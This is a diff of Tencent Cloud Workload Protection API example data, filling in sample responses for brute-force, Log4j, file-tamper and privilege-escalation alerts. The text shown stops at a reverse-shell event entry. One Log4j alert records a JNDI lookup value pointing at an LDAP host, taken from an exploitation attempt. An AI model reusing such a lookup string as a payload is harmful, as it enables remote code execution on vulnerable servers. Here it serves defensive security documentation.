+ "output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"BruteAttackList\": [\n {\n \"Id\": 202443000000,\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"MachineIp\": \"172.16.0.40\",\n \"MachineName\": \"机器名称\",\n \"UserName\": \"root\",\n \"SrcIp\": \"1.1.1.1\",\n \"Status\": \"SUCCESS\",\n \"EventType\": 300,\n \"Country\": 1,\n \"City\": 343,\n \"Province\": 32,\n \"CreateTime\": \"2024-10-22 19:50:12\",\n \"ModifyTime\": \"2024-10-22 20:06:34\",\n \"BanStatus\": 1,\n \"Count\": 436,\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"IsProVersion\": true,\n \"Protocol\": \"ssh\",\n \"Port\": 22,\n \"InstanceId\": \"ins-12332112\",\n \"Location\": \"中国香港::\",\n \"DataStatus\": 0,\n \"RiskLevel\": 2,\n \"MachineExtraInfo\": {\n \"WanIP\": \"1.1.1.1\",\n \"PrivateIP\": \"\",\n \"NetworkType\": 0,\n \"NetworkName\": \"\",\n \"InstanceID\": \"ins-12332112\",\n \"HostName\": \"\"\n },\n \"DataFrom\": 0,\n \"AttackStatusDesc\": \"破解成功\",\n \"BanExpiredTime\": \"\"\n }\n ],\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
1384
1372
  "title": "获取密码破解列表"
1385
1373
  }
1386
1374
  ],
@@ -1442,7 +1430,7 @@
1442
1430
  {
1443
1431
  "document": "",
1444
1432
  "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeDefenceEventDetail\n<公共请求参数>\n\n{\n \"Id\": 123\n}",
1445
- "output": "{\n \"Response\": {\n \"Data\": {\n \"City\": \"深圳\",\n \"StackTrace\": \"xx\",\n \"Fix\": \"修复描述\",\n \"NetworkPayload\": \"xx\",\n \"Id\": 0,\n \"SourceIp\": \"xx\",\n \"Status\": 0,\n \"Description\": \"xx\",\n \"EventType\": 1,\n \"ExceptionPstree\": \"xx\",\n \"MergeTime\": \"xx\",\n \"Count\": 0,\n \"MachineStatus\": \"ONLINE\",\n \"VulName\": \"xx\",\n \"Alias\": \"xx\",\n \"MainClass\": \"xx.class\",\n \"CveId\": \"xx\",\n \"Pid\": 0,\n \"PrivateIp\": \"xx\",\n \"PublicIp\": \"xx\",\n \"Quuid\": \"xx\",\n \"EventDetail\": \"xx\",\n \"SourcePort\": [\n 1\n ],\n \"CreateTime\": \"xx\"\n },\n \"RequestId\": \"xx\"\n }\n}",
1433
+ "output": "{\n \"Response\": {\n \"Data\": {\n \"Id\": 10001,\n \"Status\": 1,\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Alias\": \"Alias-name\",\n \"MachineStatus\": \"ONLINE\",\n \"PrivateIp\": \"1.1.1.1\",\n \"PublicIp\": \"1.1.1.1.\",\n \"CreateTime\": \"2024-10-23 11:41:10\",\n \"MergeTime\": \"2024-10-23 11:43:52\",\n \"VulName\": \"Apache log4j2 远程代码执行漏洞 (CVE-2021-44228)\",\n \"EventType\": 2,\n \"Count\": 20,\n \"CveId\": \"CVE-2021-44228\",\n \"SourceIp\": \"\",\n \"City\": \"\",\n \"SourcePort\": null,\n \"Description\": \"腾讯安全注意到,一个Apache Log4j2高危漏洞细节已被公开,Log4j-2<2.15.0的版本中存在JNDI注入漏洞,当程序将用户输入的数据进行日志记录时,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。\",\n \"Fix\": \"请注意,只有 log4j-core JAR 文件受此漏洞影响。仅使用 log4j-api JAR 文件而不使用 log4j-core JAR 文件的应用程序不受此漏洞的影响。腾讯安全专家建议受影响的用户尽快升级到2.16.0及以上版本。\\n最新安全版本请参考官方安全通告:https://logging.apache.org/log4j/2.x/security.html\\n更新包下载地址:https://logging.apache.org/log4j/2.x/download.html\\n漏洞缓解措施 (仍会检出漏洞):\\n(1)从类路径中删除 JndiLookup 类: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\\n腾讯云WAF和云防火墙均已支持该漏洞防护\\nWAF试用:https://cloud.tencent.com/act/pro/clbwafenterprise \\n配置WAF: https://console.cloud.tencent.com/guanjia/tea-instance-new\\n云防火墙试用:https://console.cloud.tencent.com/cfw/ips\",\n \"NetworkPayload\": \"OiAK\",\n \"Pid\": 20545,\n \"MainClass\": \"org.eclipse.jetty.start.Main\",\n \"StackTrace\": \"org.apache.logging.log4j.core.lookup.JndiLookup.lookup\\norg.apache.logging.log4j.core.lookup.Interpolator.lookup\\norg.apache.logging.log4j.core.lookup.StrSubstitutor.resolveVariable\\norg.apache.logging.log4j.core.lookup.StrSubstitutor.substitute\\norg.apache.logging.log4j.core.lookup.StrSubstitutor.substitute\\norg.apache.logging.log4j.core.lookup.StrSubstitutor.replace\\norg.apache.logging.log4j.core.pattern.MessagePatternConverter.format\\norg.apache.logging.log4j.core.pattern.PatternFormatter.format\\norg.apache.logging.log4j.core.pattern.MaxLengthConverter.format\\norg.apache.logging.log4j.core.pattern.PatternFormatter.format\\norg.apache.logging.log4j.core.layout.PatternLayout$PatternSerializer.toSerializable\\norg.apache.logging.log4j.core.layout.PatternLayout.toText\\norg.apache.logging.log4j.core.layout.PatternLayout.encode\\norg.apache.logging.log4j.core.layout.PatternLayout.encode\\norg.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.directEncodeEvent\\norg.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.tryAppend\\norg.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.append\\norg.apache.logging.log4j.core.config.AppenderControl.tryCallAppender\\norg.apache.logging.log4j.core.config.AppenderControl.callAppender0\\norg.apache.logging.log4j.core.config.AppenderControl.callAppenderPreventRecursion\\norg.apache.logging.log4j.core.config.AppenderControl.callAppender\\norg.apache.logging.log4j.core.config.LoggerConfig.callAppenders\\norg.apache.logging.log4j.core.async.AsyncLoggerConfig.callAppenders\\norg.apache.logging.log4j.core.config.LoggerConfig.processLogEvent\\norg.apache.logging.log4j.core.config.LoggerConfig.log\\norg.apache.logging.log4j.core.async.AsyncLoggerConfig.log\\norg.apache.logging.log4j.core.async.AsyncLoggerConfig.logToAsyncLoggerConfigsOnCurrentThread\\norg.apache.logging.log4j.core.async.AsyncLoggerConfigDisruptor$Log4jEventWrapperHandler.onEvent\\norg.apache.logging.log4j.core.async.AsyncLoggerConfigDisruptor$Log4jEventWrapperHandler.onEvent\\ncom.lmax.disruptor.BatchEventProcessor.processEvents\\ncom.lmax.disruptor.BatchEventProcessor.run\\njava.lang.Thread.run\\n\",\n \"EventDetail\": \"[{\\\"name\\\":\\\"jndiurl\\\",\\\"value\\\":\\\"ldap://1.8.0_102.example.com\\\"}]\",\n \"ExceptionPstree\": \"\",\n \"MachineExtraInfo\": {\n \"WanIP\": \"1.1.1.1\",\n \"PrivateIP\": \"1.1.1.1\",\n \"NetworkType\": 1,\n \"NetworkName\": \"vpc-12332112\",\n \"InstanceID\": \"ins-12332112\",\n \"HostName\": \"机器名称\"\n }\n },\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
1446
1434
  "title": "获取漏洞防御事件详情"
1447
1435
  }
1448
1436
  ],
@@ -1530,7 +1518,7 @@
1530
1518
  {
1531
1519
  "document": "正常获取",
1532
1520
  "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeFileTamperEvents\n<公共请求参数>\n\n{\n \"Offset\": 1,\n \"Limit\": 1\n}",
1533
- "output": "{\n \"Response\": {\n \"List\": [\n {\n \"Id\": 370572797,\n \"Uuid\": \"1c26308c-5493-4eaf-a817-112ec25f499e\",\n \"Quuid\": \"1c26308c-5493-4eaf-a817-112ec25f499e\",\n \"HostIp\": \"0.0.0.0\",\n \"HostName\": \"销售许可测试机器\",\n \"Type\": 0,\n \"ProcessExe\": \"/usr/bin/crontab\",\n \"ProcessArgv\": \"crontab /root/cron.tmp\",\n \"Target\": \"/var/spool/cron/#tmp.VM-124-81-tencentos.XXXX2QUwZR\",\n \"Status\": 0,\n \"EventCount\": 1,\n \"RuleId\": 1,\n \"RuleName\": \"系统策略-篡改计划任务\",\n \"Pstree\": \"[{\\\"pid\\\":980959,\\\"exe\\\":\\\"/usr/bin/crontab\\\",\\\"account\\\":\\\"root:root\\\",\\\"cmdline\\\":\\\"crontab /root/cron.tmp\\\",\\\"start_time\\\":1729557954,\\\"type\\\":1},{\\\"pid\\\":2288,\\\"exe\\\":\\\"/root/chaos-executor\\\",\\\"account\\\":\\\"root:root\\\",\\\"cmdline\\\":\\\"./chaos-executor d -p 29785a94e8324cda92d0715188765ece -f id_rsa.pub -n Production -s polaris://trpc.tchaos.ServerPush;polaris://trpc.tchaos.proxy.ServerPush -c Production\\\",\\\"start_time\\\":1729471587,\\\"type\\\":2}]\",\n \"CreateTime\": \"2024-10-22 08:45:58\",\n \"ModifyTime\": \"2024-10-22 08:45:58\",\n \"Level\": 1,\n \"RuleCategory\": 0,\n \"MachineStatus\": \"ONLINE\",\n \"Description\": \"检测到系统计划任务被修改\",\n \"Suggestion\": \"排查是否为正常业务需要的计划任务修改\",\n \"PrivateIp\": \"xx.xx.xx.xx\",\n \"ExePermission\": \"-rwsr-xr-x\",\n \"UserName\": \"0\",\n \"UserGroup\": \"0\",\n \"ExeMd5\": \"569f953571579ec4ae613cca7862930a\",\n \"ExeSize\": 0,\n \"ExeTime\": 1669715461,\n \"TargetSize\": 981,\n \"TargetPermission\": \"-rw-------\",\n \"TargetModifyTime\": \"2024-10-22 08:45:54\",\n \"TargetCreatTime\": \"2024-10-22 08:45:54\",\n \"ExePid\": 980959,\n \"TargetName\": \"#tmp.VM-124-81-tencentos.XXXX2QUwZR\",\n \"Reference\": \"\",\n \"ExeName\": \"crontab\",\n \"FileAction\": \"write\",\n \"MachineExtraInfo\": {\n \"WanIP\": \"0.0.0.0\",\n \"PrivateIP\": \"xx.xx.xx.xx\",\n \"NetworkType\": 0,\n \"NetworkName\": \"\",\n \"InstanceID\": \"ins-dsdsds\",\n \"HostName\": \"\"\n }\n }\n ],\n \"TotalCount\": 1,\n \"RequestId\": \"abc\"\n }\n}",
1521
+ "output": "{\n \"Response\": {\n \"List\": [\n {\n \"Id\": 370572797,\n \"Uuid\": \"1c26308c-5493-4eaf-a817-112ec25f499e\",\n \"Quuid\": \"1c26308c-5493-4eaf-a817-112ec25f499e\",\n \"HostIp\": \"0.0.0.0\",\n \"HostName\": \"销售许可测试机器\",\n \"Type\": 0,\n \"ProcessExe\": \"/usr/bin/crontab\",\n \"ProcessArgv\": \"crontab /root/cron.tmp\",\n \"Target\": \"/var/spool/cron/#tmp.VM-124-81-tencentos.XXXX2QUwZR\",\n \"Status\": 0,\n \"EventCount\": 1,\n \"RuleId\": 1,\n \"RuleName\": \"系统策略-篡改计划任务\",\n \"Pstree\": \"[{\\\"pid\\\":980959,\\\"exe\\\":\\\"/usr/bin/crontab\\\",\\\"account\\\":\\\"root:root\\\",\\\"cmdline\\\":\\\"crontab /root/cron.tmp\\\",\\\"start_time\\\":1729557954,\\\"type\\\":1},{\\\"pid\\\":2288,\\\"exe\\\":\\\"/root/chaos-executor\\\",\\\"account\\\":\\\"root:root\\\",\\\"cmdline\\\":\\\"./chaos-executor d -p 29785a94e8324 -f id_rsa.pub -n Production -s Production\\\",\\\"start_time\\\":1729471587,\\\"type\\\":2}]\",\n \"CreateTime\": \"2024-10-22 08:45:58\",\n \"ModifyTime\": \"2024-10-22 08:45:58\",\n \"Level\": 1,\n \"RuleCategory\": 0,\n \"MachineStatus\": \"ONLINE\",\n \"Description\": \"检测到系统计划任务被修改\",\n \"Suggestion\": \"排查是否为正常业务需要的计划任务修改\",\n \"PrivateIp\": \"xx.xx.xx.xx\",\n \"ExePermission\": \"-rwsr-xr-x\",\n \"UserName\": \"0\",\n \"UserGroup\": \"0\",\n \"ExeMd5\": \"569f953571579ec4ae613cca7862930a\",\n \"ExeSize\": 0,\n \"ExeTime\": 1669715461,\n \"TargetSize\": 981,\n \"TargetPermission\": \"-rw-------\",\n \"TargetModifyTime\": \"2024-10-22 08:45:54\",\n \"TargetCreatTime\": \"2024-10-22 08:45:54\",\n \"ExePid\": 980959,\n \"TargetName\": \"#tmp.VM-124-81-tencentos.XXXX2QUwZR\",\n \"Reference\": \"\",\n \"ExeName\": \"crontab\",\n \"FileAction\": \"write\",\n \"MachineExtraInfo\": {\n \"WanIP\": \"0.0.0.0\",\n \"PrivateIP\": \"xx.xx.xx.xx\",\n \"NetworkType\": 0,\n \"NetworkName\": \"\",\n \"InstanceID\": \"ins-dsdsds\",\n \"HostName\": \"\"\n }\n }\n ],\n \"TotalCount\": 1,\n \"RequestId\": \"abc\"\n }\n}",
1534
1522
  "title": "核心文件监控事件列表"
1535
1523
  }
1536
1524
  ],
@@ -1593,8 +1581,8 @@
1593
1581
  "DescribeHostLoginList": [
1594
1582
  {
1595
1583
  "document": "登录审计列表",
1596
- "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeHostLoginList\n<公共请求参数>\n\n{\n \"Limit\": 1,\n \"Filters\": [\n {\n \"Values\": [\n \"abc\"\n ],\n \"Name\": \"abc\",\n \"ExactMatch\": true\n }\n ],\n \"Offset\": 1\n}",
1597
- "output": "{\n \"Response\": {\n \"HostLoginList\": [\n {\n \"Id\": 202008000000022,\n \"Uuid\": \"5cc8e4d2-311f-11ea-922b-98be9421969a\",\n \"MachineIp\": \"10.104.194.49\",\n \"MachineName\": \"v_lwjlin_centos_林\",\n \"UserName\": \"root\",\n \"SrcIp\": \"120.229.227.225\",\n \"Status\": 2,\n \"Country\": 1,\n \"City\": 216,\n \"Province\": 19,\n \"LoginTime\": \"2020-02-20 14:51:35\",\n \"ModifyTime\": \"2020-02-20 14:51:35\",\n \"IsRiskUser\": 0,\n \"Port\": 22,\n \"Location\": \"中国:广东省:深圳市\",\n \"Desc\": \"\",\n \"IsRiskSrcIp\": 1,\n \"IsRiskArea\": 1,\n \"Quuid\": \"xxxx-xxxx-xxxxxx-xxxxxx-xxxx\",\n \"RiskLevel\": 0,\n \"IsRiskTime\": 1,\n \"MachineExtraInfo\": {\n \"WanIP\": \"111.111.111.111\",\n \"InstanceID\": \"ins-12341234\",\n \"NetworkName\": \"\",\n \"PrivateIP\": \"1.1.1.1\",\n \"NetworkType\": 1,\n \"HostName\": \"abc\"\n }\n }\n ],\n \"RequestId\": \"4234234\",\n \"TotalCount\": 446\n }\n}",
1584
+ "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeHostLoginList\n<公共请求参数>\n\n{\n \"Limit\": 1,\n \"Offset\": 1\n}",
1585
+ "output": "{\n \"Response\": {\n \"HostLoginList\": [\n {\n \"Id\": 202008000000022,\n \"Uuid\": \"5cc8e4d2-311f-11ea-922b-98be9421969a\",\n \"MachineIp\": \"10.104.194.49\",\n \"MachineName\": \"v_lwjlin_centos_林\",\n \"UserName\": \"root\",\n \"SrcIp\": \"120.229.227.225\",\n \"Status\": 2,\n \"Country\": 1,\n \"City\": 216,\n \"Province\": 19,\n \"LoginTime\": \"2020-02-20 14:51:35\",\n \"ModifyTime\": \"2020-02-20 14:51:35\",\n \"IsRiskUser\": 0,\n \"Port\": 22,\n \"Location\": \"中国:广东省:深圳市\",\n \"Desc\": \"\",\n \"IsRiskSrcIp\": 1,\n \"IsRiskArea\": 1,\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"RiskLevel\": 0,\n \"IsRiskTime\": 1,\n \"MachineExtraInfo\": {\n \"WanIP\": \"1.1.1.1\",\n \"InstanceID\": \"ins-12341234\",\n \"NetworkName\": \"\",\n \"PrivateIP\": \"1.1.1.1\",\n \"NetworkType\": 1,\n \"HostName\": \"机器名称\"\n }\n }\n ],\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\",\n \"TotalCount\": 1\n }\n}",
1598
1586
  "title": "登录审计列表"
1599
1587
  }
1600
1588
  ],
@@ -1801,16 +1789,16 @@
1801
1789
  "DescribeLoginWhiteCombinedList": [
1802
1790
  {
1803
1791
  "document": "获取登录审计白名单列表-支持新版本筛选",
1804
- "input": "https://cwp.tencentcloudapi.com/?Action=DescribeLoginWhiteCombinedList\n&Limit=10\n&Offset=0\n&<公共请求参数>",
1805
- "output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"RequestId\": \"xx\",\n \"LoginWhiteCombinedInfos\": [\n {\n \"UserName\": \"xx\",\n \"Remark\": \"xx\",\n \"Name\": \"xx\",\n \"Places\": [\n {\n \"CityId\": 1,\n \"CountryId\": 1,\n \"ProvinceId\": 1\n }\n ],\n \"Locale\": \"xx\",\n \"IsGlobal\": 1,\n \"CreateTime\": \"xx\",\n \"Uuid\": \"xx\",\n \"StartTime\": \"xx\",\n \"ModifyTime\": \"xx\",\n \"SrcIp\": \"xx\",\n \"EndTime\": \"xx\",\n \"Id\": 1,\n \"Desc\": \"xx\"\n }\n ]\n }\n}",
1792
+ "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeLoginWhiteCombinedList\n<公共请求参数>\n\n{\n \"Limit\": \"10\",\n \"Offset\": \"0\"\n}",
1793
+ "output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\",\n \"LoginWhiteCombinedInfos\": [\n {\n \"Id\": 357790160,\n \"Places\": null,\n \"UserName\": \"root\",\n \"SrcIp\": \"1.1.1.1\",\n \"IsGlobal\": 0,\n \"CreateTime\": \"2019-12-25 11:57:15\",\n \"ModifyTime\": \"2019-12-25 11:57:15\",\n \"Locale\": \"\",\n \"Locations\": \"\",\n \"Remark\": \"\",\n \"StartTime\": \"\",\n \"EndTime\": \"\",\n \"Name\": \"cwp\",\n \"Desc\": \"1.1.1.1\",\n \"Uuid\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n ]\n }\n}",
1806
1794
  "title": "获取登录审计白名单列表-支持新版本筛选"
1807
1795
  }
1808
1796
  ],
1809
1797
  "DescribeLoginWhiteHostList": [
1810
1798
  {
1811
1799
  "document": "编辑登录审计白名单",
1812
- "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeLoginWhiteHostList\n<公共请求参数>\n\n{\n \"Limit\": 1,\n \"Id\": 1,\n \"Filters\": [\n {\n \"Values\": [\n \"xx\"\n ],\n \"Name\": \"xx\",\n \"ExactMatch\": true\n }\n ],\n \"Offset\": 1\n}",
1813
- "output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"Hosts\": [\n {\n \"MachineName\": \"xx\",\n \"Quuid\": \"xx\",\n \"MachineWanIp\": \"xx\",\n \"Uuid\": \"xx\",\n \"MachineIp\": \"xx\",\n \"Tags\": []\n }\n ],\n \"RequestId\": \"xx\"\n }\n}",
1800
+ "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeLoginWhiteHostList\n<公共请求参数>\n\n{\n \"Limit\": 1,\n \"Id\": 1,\n \"Offset\": 1\n}",
1801
+ "output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"Hosts\": [\n {\n \"MachineName\": \"机器名称\",\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"MachineWanIp\": \"1.1.1.1\",\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"MachineIp\": \"1.1.1.1\",\n \"Tags\": []\n }\n ],\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
1814
1802
  "title": "编辑登录审计白名单"
1815
1803
  }
1816
1804
  ],
@@ -1818,7 +1806,7 @@
1818
1806
  {
1819
1807
  "document": "获取异地登录白名单列表",
1820
1808
  "input": "https://cwp.tencentcloudapi.com/?Action=DescribeLoginWhiteList\n&Limit=10\n&Offset=0\n&<公共请求参数>",
1821
- "output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"RequestId\": \"xx\",\n \"LoginWhiteLists\": [\n {\n \"UserName\": \"xx\",\n \"Uuid\": \"xx\",\n \"Places\": [\n {\n \"CityId\": 1,\n \"CountryId\": 1,\n \"ProvinceId\": 1\n },\n {\n \"CityId\": 1,\n \"CountryId\": 1,\n \"ProvinceId\": 1\n }\n ],\n \"MachineName\": \"xx\",\n \"HostIp\": \"xx\",\n \"IsGlobal\": true,\n \"CreateTime\": \"2020-09-22 00:00:00\",\n \"StartTime\": \"xx\",\n \"ModifyTime\": \"2020-09-22 00:00:00\",\n \"SrcIp\": \"xx\",\n \"EndTime\": \"xx\",\n \"Id\": 1\n },\n {\n \"UserName\": \"xx\",\n \"Uuid\": \"xx\",\n \"Places\": [\n {\n \"CityId\": 1,\n \"CountryId\": 1,\n \"ProvinceId\": 1\n }\n ],\n \"MachineName\": \"xx\",\n \"ModifyTime\": \"2020-09-22 00:00:00\",\n \"IsGlobal\": true,\n \"Id\": 1,\n \"StartTime\": \"xx\",\n \"HostIp\": \"xx\",\n \"SrcIp\": \"xx\",\n \"EndTime\": \"xx\",\n \"CreateTime\": \"2020-09-22 00:00:00\"\n }\n ]\n }\n}",
1809
+ "output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\",\n \"LoginWhiteLists\": [\n {\n \"UserName\": \"root\",\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Places\": [\n {\n \"CityId\": 1,\n \"CountryId\": 1,\n \"ProvinceId\": 1\n },\n {\n \"CityId\": 1,\n \"CountryId\": 1,\n \"ProvinceId\": 1\n }\n ],\n \"MachineName\": \"机器名称\",\n \"HostIp\": \"1.1.1.1\",\n \"IsGlobal\": true,\n \"CreateTime\": \"2020-09-22 00:00:00\",\n \"StartTime\": \"2020-09-22 00:00:00\",\n \"ModifyTime\": \"2020-09-22 00:00:00\",\n \"SrcIp\": \"1.1.1.1\",\n \"EndTime\": \"2020-09-22 00:00:00\",\n \"Id\": 1\n }\n ]\n }\n}",
1822
1810
  "title": "获取异地登录白名单列表"
1823
1811
  }
1824
1812
  ],
@@ -1970,7 +1958,7 @@
1970
1958
  {
1971
1959
  "document": "",
1972
1960
  "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeMalwareRiskOverview\n<公共请求参数>\n\n{}",
1973
- "output": "{\n \"Response\": {\n \"Data\": {\n \"ProcessCount\": 0,\n \"ScanTime\": \"xx\",\n \"HostCount\": 0,\n \"IsFirstScan\": true,\n \"FileCount\": 0\n },\n \"RequestId\": \"xx\"\n }\n}",
1961
+ "output": "{\n \"Response\": {\n \"Data\": {\n \"ProcessCount\": 0,\n \"ScanTime\": \"2019-12-25 11:57:15\",\n \"HostCount\": 0,\n \"IsFirstScan\": true,\n \"FileCount\": 0\n },\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
1974
1962
  "title": "获取文件查杀概览信息"
1975
1963
  }
1976
1964
  ],
@@ -2050,8 +2038,8 @@
2050
2038
  {
2051
2039
  "document": "",
2052
2040
  "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribePrivilegeEventInfo\n<公共请求参数>\n\n{\n \"Id\": 12\n}",
2053
- "output": "{\n \"Response\": {\n \"PrivilegeEventInfo\": {\n \"UserName\": \"xx\",\n \"Uuid\": \"xx\",\n \"ParentProcUser\": \"xx\",\n \"ProcFilePrivilege\": \"xx\",\n \"UserGroup\": \"xx\",\n \"Status\": 1,\n \"MachineWanIp\": \"xx\",\n \"Tags\": [\n \"xx\"\n ],\n \"MachineName\": \"xx\",\n \"HarmDescribe\": \"xx\",\n \"SuggestScheme\": \"xx\",\n \"CmdLine\": \"xx\",\n \"NewCaps\": \"xx\",\n \"ParentProcName\": \"xx\",\n \"ProcessName\": \"xx\",\n \"ParentProcPath\": \"xx\",\n \"Id\": 1,\n \"References\": [\n \"xx\"\n ],\n \"Quuid\": \"xx\",\n \"ParentProcGroup\": \"xx\",\n \"HostIp\": \"xx\",\n \"MachineStatus\": \"xx\",\n \"FullPath\": \"xx\",\n \"CreateTime\": \"xx\",\n \"PsTree\": \"xx\"\n },\n \"RequestId\": \"f14ce73f-50d7-4c36-af1d-fc33dae510c4\"\n }\n}",
2054
- "title": "示例"
2041
+ "output": "{\n \"Response\": {\n \"PrivilegeEventInfo\": {\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"UserName\": \"root\",\n \"UserGroup\": \"1000\",\n \"ProcessName\": \"privilege\",\n \"CmdLine\": \"./privilege\",\n \"ParentProcName\": \"bash\",\n \"ParentProcUser\": \"1000\",\n \"CreateTime\": \"2024-09-06 14:17:45\",\n \"Status\": 0,\n \"FullPath\": \"/tmp/privilege\",\n \"ParentProcGroup\": \"1000\",\n \"ParentProcPath\": \"/usr/bin/bash\",\n \"PsTree\": \"[]\",\n \"NewCaps\": \"SYS_RAWIO|DAC_OVERRIDE|DAC_READ_SEARCH|FOWNER|FSETID|KILL|SETGID|SETUID|SETPCAP|LINUX_IMMUTABLE|NET_BIND_SERVICE|NET_BROADCAST|NET_ADMIN|NET_RAW|IPC_LOCK|IPC_OWNER|SYS_MODULE|CHOWN|BLOCK_SUSPEND|WAKE_ALARM|SYSLOG|MAC_ADMIN|MAC_OVERRIDE|SETFCAP|AUDIT_CONTROL|AUDIT_WRITE|LEASE|MKNOD|SYS_TTY_CONFIG|SYS_TIME|SYS_RESOURCE|SYS_NICE|SYS_BOOT|SYS_ADMIN|SYS_PACCT|SYS_PTRACE|SYS_CHROOT\",\n \"ModifyTime\": \"2024-09-06 14:17:45\",\n \"MachineName\": \"机器名称\",\n \"ProcFilePrivilege\": \"-rwsr-xr-x\",\n \"HostIp\": \"1.1.1.1\",\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Id\": 10001,\n \"MachineWanIp\": \"1.1.1.1\",\n \"SuggestScheme\": \"1、检查系统是否被添加新用户,或者存在异常权限用户;\\n2、检查恶意进程及非法端口,删除可疑的启动项和定时任务;\\n3.隔离或者删除相关的木马文件;\\n4.对系统进行风险排查,并进行安全加固,详情可参考如下链接:xa0\\n【Linux】https://cloud.tencent.com/document/product/296/9604xa0\\n【Windows】https://cloud.tencent.com/document/product/296/9605\",\n \"HarmDescribe\": \"黑客在入侵服务器后,为了进行下一步的恶意操作,会通过特定漏洞提升用户权限,或者直接获取root用户权限。\",\n \"Tags\": [],\n \"References\": [],\n \"MachineStatus\": \"ONLINE\"\n },\n \"RequestId\": \"f7f4d0bc-171d-491e-b97b-5c9bcb5a52a0\"\n }\n}",
2042
+ "title": "查询本地提权详情"
2055
2043
  }
2056
2044
  ],
2057
2045
  "DescribePrivilegeEvents": [
@@ -2066,7 +2054,7 @@
2066
2054
  {
2067
2055
  "document": "获取本地提权规则列表",
2068
2056
  "input": "https://cwp.tencentcloudapi.com/?Action=DescribePrivilegeRules\n&<公共请求参数>",
2069
- "output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"List\": [\n {\n \"Status\": 1,\n \"ModifyTime\": \"xx\",\n \"Uuid\": \"xx\",\n \"SMode\": 1,\n \"IsGlobal\": 1,\n \"CreateTime\": \"xx\",\n \"ProcessName\": \"xx\",\n \"Hostip\": \"xx\",\n \"Operator\": \"xx\",\n \"Id\": 1\n }\n ],\n \"RequestId\": \"xx\"\n }\n}",
2057
+ "output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"List\": [\n {\n \"Id\": 10001,\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"ProcessName\": \"privilege\",\n \"SMode\": 1,\n \"Operator\": \"\",\n \"Status\": 0,\n \"IsGlobal\": 0,\n \"CreateTime\": \"2024-08-23 17:13:47\",\n \"ModifyTime\": \"2024-08-23 17:13:47\",\n \"Hostip\": \"1.1.1.1\"\n }\n ],\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
2070
2058
  "title": "获取本地提权规则列表"
2071
2059
  }
2072
2060
  ],
@@ -2226,15 +2214,15 @@
2226
2214
  {
2227
2215
  "document": "",
2228
2216
  "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeReverseShellEventInfo\n<公共请求参数>\n\n{\n \"Id\": 12\n}",
2229
